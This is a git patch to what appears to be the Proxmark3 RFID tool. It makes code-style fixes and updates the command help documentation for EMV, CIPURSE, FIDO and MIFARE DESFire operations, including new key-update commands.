From c53dc84e6190edf94eb5105d91572fc7aa908e1f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ya=C5=9Far=20Klawohn?= Date: Wed, 9 Feb 2022 15:21:00 +0100 Subject: [PATCH 1/3] make style --- client/src/cmdhfcipurse.c | 6 +- client/src/cmdhfmfdes.c | 2 +- client/src/cmdhfmfp.c | 2 +- client/src/cmdhfmfu.c | 20 +- client/src/pm3line_vocabulory.h | 2 + doc/commands.json | 1351 ++++++++++++++++--------------- doc/commands.md | 24 +- 7 files changed, 735 insertions(+), 672 deletions(-) diff --git a/client/src/cmdhfcipurse.c b/client/src/cmdhfcipurse.c index 3a8e492449..27c29c1912 100644 --- a/client/src/cmdhfcipurse.c +++ b/client/src/cmdhfcipurse.c @@ -233,7 +233,7 @@ static int CLIParseCommandParametersEx(CLIParserContext *ctx, size_t keyid, size if (CLIParamHexToBuf(arg_get_str(ctx, aidid), hdata, hdatalen, &hdatalen)) { return PM3_ESOFT; } - + if (hdatalen && (hdatalen < 1 || hdatalen > 16)) { PrintAndLogEx(ERR, _RED_("ERROR:") " application id length must be 1-16 bytes only"); return PM3_EINVARG; @@ -1466,7 +1466,7 @@ static int CmdHFCipurseUpdateKey(const char *Cmd) { arg_int0(NULL, "newkeyn", "", "target key ID"), arg_str0(NULL, "newkey", "", "new key"), arg_str0(NULL, "newkeya", "", "new key additional info. 0x00 by default"), - + arg_int0(NULL, "enckeyn", "", "encrypt key ID (must be equal to the key on the card)"), arg_str0(NULL, "enckey", "", "encrypt key (must be equal to the key on the card)"), @@ -1541,7 +1541,7 @@ static int CmdHFCipurseUpdateKey(const char *Cmd) { uint8_t encKey[CIPURSE_AES_KEY_LENGTH] = CIPURSE_DEFAULT_KEY; if (hdatalen) memcpy(encKey, hdata, CIPURSE_AES_KEY_LENGTH); - + bool noauth = arg_get_lit(ctx, 15); bool needCommit = arg_get_lit(ctx, 16); diff --git a/client/src/cmdhfmfdes.c b/client/src/cmdhfmfdes.c index 5b7438c8cc..fa445d5012 100644 --- a/client/src/cmdhfmfdes.c +++ b/client/src/cmdhfmfdes.c @@ -4998,7 +4998,7 @@ static int CmdHF14ADesWriteData(const char *Cmd) { arg_lit0(NULL, "debit", "use for value file debit operation instead of credit"), arg_lit0(NULL, "commit", "commit needs for backup file only. For the other file types and in the `auto` mode - command set it automatically"), arg_int0(NULL, "updaterec", "", "Record number for update record command. Updates record instead of write. Lastest record - 0"), - arg_str0(NULL, "isoid" , "", "Application ISO ID (ISO DF ID) (2 hex bytes, big endian)"), + arg_str0(NULL, "isoid", "", "Application ISO ID (ISO DF ID) (2 hex bytes, big endian)"), arg_str0(NULL, "fileisoid", "", "File ISO ID (ISO DF ID) (2 hex bytes, big endian). Works only for ISO write commands"), arg_str0(NULL, "readerid", "", "reader id for CommitReaderID command. If present - the command issued before write command"), arg_str0(NULL, "trkey", "", "key for decode previous reader id"), diff --git a/client/src/cmdhfmfp.c b/client/src/cmdhfmfp.c index b90f1b9bc1..fa8bfbd9e4 100644 --- a/client/src/cmdhfmfp.c +++ b/client/src/cmdhfmfp.c @@ -893,7 +893,7 @@ static int CmdHFMFPWrbl(const char *Cmd) { void *argtable[] = { arg_param_begin, - arg_lit0("v", "verbose", "Verbose mode"), + arg_lit0("v", "verbose", "Verbose mode"), arg_lit0("b", "keyb", "Use key B (def: keyA)"), arg_int1(NULL, "blk", "<0..255>", "Block number"), arg_str1("d", "data", "", "Data, 16 hex bytes"), diff --git a/client/src/cmdhfmfu.c b/client/src/cmdhfmfu.c index 3a19c4ade6..fa5fcb8a00 100644 --- a/client/src/cmdhfmfu.c +++ b/client/src/cmdhfmfu.c @@ -135,22 +135,22 @@ static int ul_print_nxp_silicon_info(uint8_t *card_uid) { uint16_t waferCoordX = ((uid[6] & 3) << 8) | uid[1]; uint16_t waferCoordY = ((uid[6] & 12) << 6) | uid[2]; uint32_t waferCounter = ( - (uid[4] << 5) | - ((uid[6] & 0xF0) << 17) | - (uid[5] << 13) | - (uid[3] >> 3) - ); + (uid[4] << 5) | + ((uid[6] & 0xF0) << 17) | + (uid[5] << 13) | + (uid[3] >> 3) + ); uint8_t testSite = uid[3] & 7; PrintAndLogEx(NORMAL, ""); PrintAndLogEx(INFO, "--- " _CYAN_("Tag Silicon Information")); PrintAndLogEx(INFO, " Wafer Counter: %" PRId32 " ( 0x%02" PRIX32 " )", waferCounter, waferCounter); PrintAndLogEx(INFO, " Wafer Coordinates: x %" PRId16 ", y %" PRId16 " (0x%02" PRIX16 ", 0x%02" PRIX16 ")" - , waferCoordX - , waferCoordY - , waferCoordX - , waferCoordY - ); + , waferCoordX + , waferCoordY + , waferCoordX + , waferCoordY + ); PrintAndLogEx(INFO, " Test Site: %u", testSite); return PM3_SUCCESS; } diff --git a/client/src/pm3line_vocabulory.h b/client/src/pm3line_vocabulory.h index b58422b706..63a438f6d1 100644 --- a/client/src/pm3line_vocabulory.h +++ b/client/src/pm3line_vocabulory.h @@ -185,6 +185,8 @@ const static vocabulory_t vocabulory[] = { { 0, "hf cipurse formatall" }, { 0, "hf cipurse create" }, { 0, "hf cipurse delete" }, + { 0, "hf cipurse updkey" }, + { 0, "hf cipurse updakey" }, { 0, "hf cipurse default" }, { 1, "hf cipurse test" }, { 1, "hf epa help" }, diff --git a/doc/commands.json b/doc/commands.json index 5332ea3487..e3c68d3fca 100644 --- a/doc/commands.json +++ b/doc/commands.json @@ -708,7 +708,7 @@ "-h, --help this help", "-k, -k, --keep keep field on for next command", "-a, -a, --apdu show apdu reqests and responses", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default." + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)" ], "usage": "emv challenge [-hkaw]" }, @@ -728,10 +728,10 @@ "-c, -c, --cda executes cda transaction. needs to get sdad in results.", "-d, -d, --decision terminal decision. aac - declined, tc - approved, arqc - online authorisation requested", "-p, -p, --params load parameters from `emv_defparams.json` file for cdoldata making from cdol and parameters", - "-m, -m, --make make cdoldata from cdol (tag 8c and 8d) and parameters (by default uses default parameters)", + "-m, -m, --make make cdoldata from cdol (tag 8c and 8d) and parameters (def: use default parameters)", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " cdoldata/cdol" ], "usage": "emv genac [-hkcpmatw] [-d ] []..." @@ -749,17 +749,17 @@ "-h, --help this help", "-k, -k, --keep keep field on for next command", "-p, -p, --params load parameters from `emv_defparams.json` file for pdoldata making from pdol and parameters", - "-m, -m, --make make pdoldata from pdol (tag 9f38) and parameters (by default uses default parameters)", + "-m, -m, --make make pdoldata from pdol (tag 9f38) and parameters (def: uses default parameters)", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " pdoldata/pdol" ], "usage": "emv gpo [-hkpmatw] []..." }, "emv help": { "command": "emv help", - "description": "help this help test crypto logic test. list list iso7816 history --------------------------------------------------------------------------------------- emv exec available offline: no executes emv contactless transaction", + "description": "help this help test crypto logic test list list iso7816 history --------------------------------------------------------------------------------------- emv exec available offline: no executes emv contactless transaction", "notes": [ "emv exec -sat -> select card, execute msd transaction, show apdu and tlv", "emv exec -satc -> select card, execute cda transaction, show apdu and tlv" @@ -767,17 +767,17 @@ "offline": true, "options": [ "-h, --help this help", - "-s, -s, --select activate field and select card.", - "-a, -a, --apdu show apdu reqests and responses.", - "-t, -t, --tlv tlv decode results.", - "-j, -j, --jload load transaction parameters from `emv_defparams.json` file.", - "-f, -f, --forceaid force search aid. search aid instead of execute ppse.", + "-s, -s, --select activate field and select card", + "-a, -a, --apdu show apdu reqests and responses", + "-t, -t, --tlv tlv decode results", + "-j, -j, --jload load transaction parameters from `emv_defparams.json` file", + "-f, -f, --forceaid force search aid. search aid instead of execute ppse", "by default: transaction type - msd", - "-v, -v, --qvsdc transaction type - qvsdc or m/chip.", - "-c, -c, --qvsdccda transaction type - qvsdc or m/chip plus cda (sdad generation).", - "-x, -x, --vsdc transaction type - vsdc. for test only. not a standard behavior.", - "-g, -g, --acgpo visa. generate ac from gpo.", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default." + "-v, -v, --qvsdc transaction type - qvsdc or m/chip", + "-c, -c, --qvsdccda transaction type - qvsdc or m/chip plus cda (sdad generation)", + "-x, -x, --vsdc transaction type - vsdc. for test only. not a standard behavior", + "-g, -g, --acgpo visa. generate ac from gpo", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)" ], "usage": "emv exec [-hsatjfvcxgw] by default:" }, @@ -794,10 +794,10 @@ "-h, --help this help", "-k, -k, --keep keep field on for next command", "-p, -p, --params load parameters from `emv_defparams.json` file for ddoldata making from ddol and parameters", - "-m, -m, --make make ddoldata from ddol (tag 9f49) and parameters (by default uses default parameters)", + "-m, -m, --make make ddoldata from ddol (tag 9f49) and parameters (def: use default parameters)", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " ddoldata/ddol" ], "usage": "emv intauth [-hkpmatw] []..." @@ -836,10 +836,10 @@ "-s, -s, --select activate field and select card", "-k, -k, --keep keep field on for next command", "-1, --pse pse (1pay.sys.ddf01) mode", - "-2, --ppse ppse (2pay.sys.ddf01) mode (default mode)", + "-2, --ppse ppse (2pay.sys.ddf01) mode (def)", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default." + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)" ], "usage": "emv pse [-hsk12atw]" }, @@ -856,7 +856,7 @@ "-k, -k, --keep keep field on for next command", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " []..." @@ -873,7 +873,7 @@ "-h, --help this help", "-t, -t, --selftest self test", "-a, -a, --apdu show apdu reqests and responses", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default" + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)" ], "usage": "emv roca [-htaw]" }, @@ -887,17 +887,17 @@ "offline": false, "options": [ "-h, --help this help", - "-a, -a, --apdu show apdu reqests and responses.", - "-t, -t, --tlv tlv decode results.", + "-a, -a, --apdu show apdu reqests and responses", + "-t, -t, --tlv tlv decode results", "-e, -e, --extract extract tlv elements and fill application data", - "-j, -j, --jload load transaction parameters from `emv_defparams.json` file.", + "-j, -j, --jload load transaction parameters from `emv_defparams.json` file", "by default: transaction type - msd", - "-v, -v, --qvsdc transaction type - qvsdc or m/chip.", - "-c, -c, --qvsdccda transaction type - qvsdc or m/chip plus cda (sdad generation).", - "-x, -x, --vsdc transaction type - vsdc. for test only. not a standard behavior.", - "-g, -g, --acgpo visa. generate ac from gpo.", + "-v, -v, --qvsdc transaction type - qvsdc or m/chip", + "-c, -c, --qvsdccda transaction type - qvsdc or m/chip plus cda (sdad generation)", + "-x, -x, --vsdc transaction type - vsdc. for test only. not a standard behavior", + "-g, -g, --acgpo visa. generate ac from gpo", "-m, -m, --merge merge output file with card's data. (warning: the file may be corrupted!)", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " json output filename" ], "usage": "emv scan [-hatejvcxgmw] by default: " @@ -916,7 +916,7 @@ "-k, -k, --keep keep field on for next command", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default." + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)" ], "usage": "emv search [-hskatw]" }, @@ -934,7 +934,7 @@ "-k, -k, --keep keep field for next command", "-a, -a, --apdu show apdu requests and responses", "-t, -t, --tlv tlv decode results", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " applet aid" ], "usage": "emv select [-hskatw] " @@ -1703,18 +1703,18 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", "--mfd show info about master file", - "--aid select application id (aid)", + "--aid select application id (aid) ( 1..16 bytes )", "--fid file id", - "--chfid child file id (ef under application/master file)", + "--chfid child file id (ef under application/master file) ( 2 bytes )", "--noauth read file attributes without authentication", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level" + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)" ], - "usage": "hf cipurse aread [-hav] [-n ] [-k ] [--mfd] [--aid ] [--fid ] [--chfid ] [--noauth] [--sreq ] [--sresp ]" + "usage": "hf cipurse aread [-hav] [-n ] [-k ] [--mfd] [--aid ] [--fid ] [--chfid ] [--noauth] [--sreq ] [--sresp ]" }, "hf cipurse auth": { "command": "hf cipurse auth", @@ -1727,14 +1727,14 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "--aid application id (aid)", - "--fid top file/application id (fid)", + "-v, --verbose verbose mode", + "--aid application id (aid) ( 1..16 bytes )", + "--fid top file/application id (fid) ( 2 bytes )", "--mfd select masterfile by empty id", "-n key id", "-k, --key auth key" ], - "usage": "hf cipurse auth [-hav] [--aid ] [--fid ] [--mfd] [-n ] [-k ]" + "usage": "hf cipurse auth [-hav] [--aid ] [--fid ] [--mfd] [-n ] [-k ]" }, "hf cipurse awrite": { "command": "hf cipurse awrite", @@ -1749,20 +1749,20 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", "--mfd show info about master file", - "--aid select application id (aid)", + "--aid select application id (aid) ( 1..16 bytes )", "--fid file id", - "--chfid child file id (ef under application/master file)", + "--chfid child file id (ef under application/master file) ( 2 bytes )", "--noauth read file attributes without authentication", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level", + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)", "-d, --data file attributes", - "--commit need commit after write" + "--commit commit after write" ], - "usage": "hf cipurse awrite [-hav] [-n ] [-k ] [--mfd] [--aid ] [--fid ] [--chfid ] [--noauth] [--sreq ] [--sresp ] [-d ] [--commit]" + "usage": "hf cipurse awrite [-hav] [-n ] [-k ] [--mfd] [--aid ] [--fid ] [--chfid ] [--noauth] [--sreq ] [--sresp ] [-d ] [--commit]" }, "hf cipurse create": { "command": "hf cipurse create", @@ -1776,19 +1776,19 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", - "--aid application id (aid)", - "--fid file id (fid)", + "--aid application id (aid) ( 1..16 bytes )", + "--fid file id (fid) ( 2 bytes )", "--mfd select masterfile by empty id", "-d, --data data with dgi for create", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level", + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)", "--no-auth execute without authentication", - "--commit need commit after create" + "--commit commit after create" ], - "usage": "hf cipurse create [-hav] [-n ] [-k ] [--aid ] [--fid ] [--mfd] [-d ] [--sreq ] [--sresp ] [--no-auth] [--commit]" + "usage": "hf cipurse create [-hav] [-n ] [-k ] [--aid ] [--fid ] [--mfd] [-d ] [--sreq ] [--sresp ] [--no-auth] [--commit]" }, "hf cipurse default": { "command": "hf cipurse default", @@ -1804,10 +1804,10 @@ "--clear resets to defaults", "-n key id", "-k, --key authentication key", - "--aid application id (aid)", - "--fid file id" + "--aid application id (aid) ( 1..16 bytes )", + "--fid file id ( 2 bytes )" ], - "usage": "hf cipurse default [-h] [--clear] [-n ] [-k ] [--aid ] [--fid ]" + "usage": "hf cipurse default [-h] [--clear] [-n ] [-k ] [--aid ] [--fid ]" }, "hf cipurse delete": { "command": "hf cipurse delete", @@ -1822,18 +1822,18 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", "--fid file/application id under mf for delete", - "--aid application id (aid) for delete", - "--chfid child file id (ef under application/master file)", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level", + "--aid application id (aid) for delete ( 1..16 bytes )", + "--chfid child file id (ef under application/master file) ( 2 bytes )", + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)", "--no-auth execute without authentication", - "--commit commit" + "--commit commit after delete" ], - "usage": "hf cipurse delete [-hav] [-n ] [-k ] [--fid ] [--aid ] [--chfid ] [--sreq ] [--sresp ] [--no-auth] [--commit]" + "usage": "hf cipurse delete [-hav] [-n ] [-k ] [--fid ] [--aid ] [--chfid ] [--sreq ] [--sresp ] [--no-auth] [--commit]" }, "hf cipurse formatall": { "command": "hf cipurse formatall", @@ -1847,14 +1847,14 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level", + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)", "--no-auth execute without authentication" ], - "usage": "hf cipurse formatall [-hav] [-n ] [-k ] [--sreq ] [--sresp ] [--no-auth]" + "usage": "hf cipurse formatall [-hav] [-n ] [-k ] [--sreq ] [--sresp ] [--no-auth]" }, "hf cipurse help": { "command": "hf cipurse help", @@ -1880,17 +1880,17 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", - "--aid application id (aid)", + "--aid application id (aid) ( 1..16 bytes )", "--fid file id", "-o, --offset offset for reading data from file", "--noauth read file without authentication", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level" + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)" ], - "usage": "hf cipurse read [-hav] [-n ] [-k ] [--aid ] [--fid ] [-o ] [--noauth] [--sreq ] [--sresp ]" + "usage": "hf cipurse read [-hav] [-n ] [-k ] [--aid ] [--fid ] [-o ] [--noauth] [--sreq ] [--sresp ]" }, "hf cipurse select": { "command": "hf cipurse select", @@ -1905,14 +1905,14 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-t, --tlv tlv decode returned data", - "--aid application id (aid)", - "--fid top level file (or application) id (fid)", + "--aid application id (aid) 1..16 bytes", + "--fid top level file (or application) id (fid) 2 bytes", "--mfd select masterfile by empty id", - "--chfid child file id (ef under application/master file)" + "--chfid child file id (ef under application/master file) 2 bytes" ], - "usage": "hf cipurse select [-havt] [--aid ] [--fid ] [--mfd] [--chfid ]" + "usage": "hf cipurse select [-havt] [--aid ] [--fid ] [--mfd] [--chfid ]" }, "hf cipurse test": { "command": "hf cipurse test", @@ -1929,6 +1929,61 @@ ], "usage": "hf epa cnonces [-h] --size --num -d " }, + "hf cipurse updakey": { + "command": "hf cipurse updakey", + "description": "update key attributes. factory default - 0x02. b0 - update right - 1 self b1 - change key and rights - 0 frozen b2 - use as key encryption key - 1 blocked b8 - key validity - 0 valid", + "notes": [ + "hf cipurse updakey --trgkeyn 2 --attr 80 -> block key 2 for lifetime (warning!)", + "hf cipurse updakey --trgkeyn 1 --attr 02 --commit -> for key 1" + ], + "offline": false, + "options": [ + "-h, --help this help", + "-a, --apdu show apdu requests and responses", + "-v, --verbose show technical data", + "-n key id for authentication", + "-k, --key auth key", + "--aid application id (aid)", + "--fid file id (fid)", + "--mfd select masterfile by empty id", + "--trgkeyn target key id", + "--attr key attributes 1 byte", + "--sreq communication reader-picc security level", + "--sresp communication picc-reader security level", + "--no-auth execute without authentication", + "--commit commit" + ], + "usage": "hf cipurse updakey [-hav] [-n ] [-k ] [--aid ] [--fid ] [--mfd] [--trgkeyn ] [--attr ] [--sreq ] [--sresp ] [--no-auth] [--commit]" + }, + "hf cipurse updkey": { + "command": "hf cipurse updkey", + "description": "update key.", + "notes": [ + "hf cipurse updkey --aid 4144204631 --newkeyn 2 --newkeya 00 --newkey 73737373737373737373737373737373 -> update default application key 2 with default value 73..73", + "hf cipurse updkey --newkeyn 1 --newkeya 00 --newkey 0102030405060708090a0b0c0d0e0f10 --commit -> for key 1" + ], + "offline": false, + "options": [ + "-h, --help this help", + "-a, --apdu show apdu requests and responses", + "-v, --verbose show technical data", + "-n key id for authentication", + "-k, --key auth key", + "--aid application id (aid)", + "--fid file id (fid)", + "--mfd select masterfile by empty id", + "--newkeyn target key id", + "--newkey new key", + "--newkeya new key additional info. 0x00 by default", + "--enckeyn encrypt key id (must be equal to the key on the card)", + "--enckey encrypt key (must be equal to the key on the card)", + "--sreq communication reader-picc security level", + "--sresp communication picc-reader security level", + "--no-auth execute without authentication", + "--commit commit" + ], + "usage": "hf cipurse updakey [-hav] [-n ] [-k ] [--aid ] [--fid ] [--mfd] [--newkeyn ] [--newkey ] [--newkeya ] [--enckeyn ] [--enckey ] [--sreq ] [--sresp ] [--no-auth] [--commit]" + }, "hf cipurse write": { "command": "hf cipurse write", "description": "write file in the application by file id with key id and key. if no key is supplied, default key of 737373...7373 will be used", @@ -1942,19 +1997,19 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", - "--aid application id (aid)", + "--aid application id (aid) ( 1..16 bytes )", "--fid file id", "-o, --offset offset for reading data from file", "--noauth read file without authentication", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level", - "-d, --data hex data to write to new file", - "--commit need commit after write" + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)", + "-d, --data data to write to new file", + "--commit commit after write" ], - "usage": "hf cipurse write [-hav] [-n ] [-k ] [--aid ] [--fid ] [-o ] [--noauth] [--sreq ] [--sresp ] [-d ] [--commit]" + "usage": "hf cipurse write [-hav] [-n ] [-k ] [--aid ] [--fid ] [-o ] [--noauth] [--sreq ] [--sresp ] [-d ] [--commit]" }, "hf emrtd help": { "command": "hf emrtd help", @@ -2317,7 +2372,7 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu reqests and responses", - "-v, --verbose show technical data. vv - show full certificates data", + "-v, --verbose verbose mode. vv - show full certificates data", "-c, --cbor show cbor decoded data", "-l, --list add credentialid from json to allowlist", "-f, --file parameter json file name" @@ -2338,19 +2393,19 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu reqests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "default mode: dont-enforce-user-presence-and-sign", "-u, --user mode: enforce-user-presence-and-sign", "-c, --check mode: check-only", - "-f, --file json input file name for parameters", + "-f, --file json file name for parameters", "-k, --key public key to verify signature", "--kh key handle (var 0..255b)", - "--cp challenge parameter (1..16 chars)", - "--ap application parameter (1..16 chars)", + "--cp challenge parameter (1..16 chars)", + "--ap application parameter (1..16 chars)", "--cpx challenge parameter (32 bytes hex)", "--apx application parameter (32 bytes hex)" ], - "usage": "hf fido auth [-havuc] default mode: [-f ] [-k ] [--kh ] [--cp ] [--ap ] [--cpx ] [--apx ]" + "usage": "hf fido auth [-havuc] default mode: [-f ] [-k ] [--kh ] [--cp ] [--ap ] [--cpx ] [--apx ]" }, "hf fido help": { "command": "hf fido help", @@ -2396,7 +2451,7 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu reqests and responses", - "-v, --verbose show technical data. vv - show full certificates data", + "-v, --verbose verbose mode. vv - show full certificates data", "-t, --tlv show der certificate contents in tlv representation", "-c, --cbor show cbor decoded data", "-f, --file parameter json file name" @@ -2416,15 +2471,15 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data. vv - show full certificates data", + "-v, --verbose verbose mode. vv - show full certificates data", "-t, --tlv show der certificate contents in tlv representation", "-f, --file json input file name for parameters", - "--cp challenge parameter (1..16 chars)", - "--ap application parameter (1..16 chars)", + "--cp challenge parameter (1..16 chars)", + "--ap application parameter (1..16 chars)", "--cpx challenge parameter (32 bytes hex)", "--apx application parameter (32 bytes hex)" ], - "usage": "hf fido reg [-havt] [-f ] [--cp ] [--ap ] [--cpx ] [--apx ]" + "usage": "hf fido reg [-havt] [-f ] [--cp ] [--ap ] [--cpx ] [--apx ]" }, "hf gallagher clone": { "command": "hf gallagher clone", @@ -3475,7 +3530,7 @@ "-h, --help this help", "-k, --key key specified as 12 hex symbols", "--blk input block number", - "-a target key a, if found also check key b for duplicate", + "-a target key a", "-b target key b", "-*, --all target both key a & b (default)", "--mini mifare classic mini / s20", @@ -4239,7 +4294,7 @@ "command": "hf mfdes auth", "description": "select application on the card. it selects app if it is a valid one or returns an error.", "notes": [ - "hf mfdes auth -n 0 -t des -k 0000000000000000 -f none -> select picc level and authenticate with key num=0, key type=des, key=00..00 and key derivation = none", + "hf mfdes auth -n 0 -t des -k 0000000000000000 --kdf none -> select picc level and authenticate with key num=0, key type=des, key=00..00 and key derivation = none", "hf mfdes auth -n 0 -t aes -k 00000000000000000000000000000000 -> select picc level and authenticate with key num=0, key type=aes, key=00..00 and key derivation = none", "hf mfdes auth -n 0 -t des -k 0000000000000000 --save -> select picc level and authenticate and in case of successful authentication - save channel parameters to defaults", "hf mfdes auth --aid 123456 -> select application 123456 and authenticate via parameters from `default` command" @@ -4248,109 +4303,110 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", + "-t, --algo crypt algo", "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--aid application id of application for some parameters (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", "--save saves channels parameters to defaults if authentication succeeds" ], - "usage": "hf mfdes auth [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--save]" + "usage": "hf mfdes auth [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--save]" }, "hf mfdes bruteaid": { "command": "hf mfdes bruteaid", "description": "recover aids by bruteforce. warning: this command takes a loooong time", "notes": [ "hf mfdes bruteaid -> search all apps", - "hf mfdes bruteaid -s f0000f -i 16 -> search mad range manually" + "hf mfdes bruteaid --start f0000f -i 16 -> search mad range manually" ], "offline": false, "options": [ "-h, --help this help", - "-s, --start starting app id as hex bytes (3 bytes, big endian)", - "-e, --end last app id as hex bytes (3 bytes, big endian)", + "--start starting app id as hex bytes (3 bytes, big endian)", + "--end last app id as hex bytes (3 bytes, big endian)", "-i, --step increment step when bruteforcing", "-m, --mad only bruteforce the mad range" ], - "usage": "hf mfdes bruteaid [-hm] [-s ] [-e ] [-i ]" + "usage": "hf mfdes bruteaid [-hm] [--start ] [--end ] [-i ]" }, "hf mfdes changekey": { "command": "hf mfdes changekey", "description": "change picc/application key. needs to provide keynum/key for a valid authentication (may get from default parameters).", "notes": [ - "change crypto algorithm for picc key is possible, but for app keys crypto algorithm is set by createapp command and can't be changed wo application delete", + "change crypto algorithm for picc key is possible,", + "but for app keys crypto algorithm is set by createapp command and can't be changed wo application delete", "", "hf mfdes changekey --aid 123456 -> execute with default factory setup. change des key 0 in the app 123456 from 00..00 to 00..00", - "hf mfdes changekey --appisoid df01 -t aes -s lrp --newkeyno 01 -> change key 01 via lrp channelhf mfdes changekey -t des --newalgo aes --newkey 11223344556677889900112233445566 --newver a5 -> change card master key to aes one", + "hf mfdes changekey --isoid df01 -t aes -s lrp --newkeyno 01 -> change key 01 via lrp channelhf mfdes changekey -t des --newalgo aes --newkey 11223344556677889900112233445566 --newver a5 -> change card master key to aes one", "hf mfdes changekey --aid 123456 -t aes --key 00000000000000000000000000000000 --newkey 11223344556677889900112233445566 -> change app master key", "hf mfdes changekey --aid 123456 -t des -n 0 --newkeyno 1 --oldkey 5555555555555555 --newkey 1122334455667788 -> change key 1 with auth from key 0", - "hf mfdes changekey --aid 123456 -t 3tdea --newkey 11223344556677889900112233445566778899001122334 -> change 3tdea key 0 from default 00..00 to provided" + "hf mfdes changekey --aid 123456 -t 3tdea --newkey 112233445566778899001122334455667788990011223344 -> change 3tdea key 0 from default 00..00 to provided" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate 